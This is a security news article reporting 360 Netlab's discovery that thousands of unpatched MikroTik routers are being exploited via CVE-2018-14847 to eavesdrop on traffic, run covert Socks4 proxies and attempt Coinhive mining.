In yet another case of unpatched consumer devices representing a threat to the security and privacy of users, thousands of MikroTik have been uncovered which are eavesdropping on users.
The routers have been hijacked through the CVE-2018-14847 security vulnerability, a known bug which impacts the MikroTik RouterOS operating system.
The vulnerability is present in Winbox, an administration utility in the MikroTik RouterOS which also offers a GUI for router configuration.
Version 6.42 of the OS “allows remote attackers to bypass authentication and read arbitrary files by modifying a request to change one byte related to a Session ID,” according to NIST.
While patched in August, which prevents threat actors from reading or exfiltrating data passed through the router, many models remain vulnerable.
Researchers from 360 Netlab say that out of over five million devices with an open TCP/8291 port online, 1.2 million are MikroTik routers — of which, 370,000 devices remain unpatched against CVE-2018-14847.
The team has been picking up active exploits of a number of these routers since mid-July through a honeypot system.
In total, over 7,500 routers are directly forwarding user data, while 239,000 have had their Socks4 proxies covertly enabled.
“The Socks4 port is mostly TCP/4153, and very interestingly, the Socks4 proxy config only allows access from one single net-block 220.127.116.11/25,” the researchers say. “In order for the attacker to gain control even after device reboot (IP change), the device is configured to run a scheduled task to periodically report its latest IP address by accessing a specific attacker’s URL. The attacker also continues to scan more MikroTik RouterOS devices by using these compromised Socks4 proxies.”
360 Netlab added while it is not known why this tampering has taken place, the researchers believe it is “something significant.”
All proxy requests in the impacted devices are also redirected to a local HTTP error page which the cybercriminals hoped would enable the launch of a Coinhive mining script, used to mine Monero.
However, the attacker’s own proxy ACLs block the script from operating.
“The MikroTik RouterOS device allows users to capture packets on the router and forward the captured network traffic to the specified Stream server,” the researcher said, adding that ports 20, 21, 25, 110, and 143 appear to be of the most interest to the eavesdroppers.
“This deserve[s] some questions, why the attacker is paying attention to the network management protocol regular users barely use?,” 360 Netlab commented. “Are they trying to monitor and capture some special users’ network snmp community strings? We don’t have an answer at this point, but we would be very interested to know what the answer might be.”
The majority of victims come from Russia, followed by Brazil, Indonesia, India, and Iran.
Due to the researchers’ findings, one of the attacker IPs, 18.104.22.168, has now been suspended and is no longer a threat.
Back in August, it was discovered that MikroTik routers were being compromised as part of a massive cryptojacking campaign. Up to 200,000 routers had been enslaved at the time of discovery and were being forced to mine for Monero by way of the Coinhive script.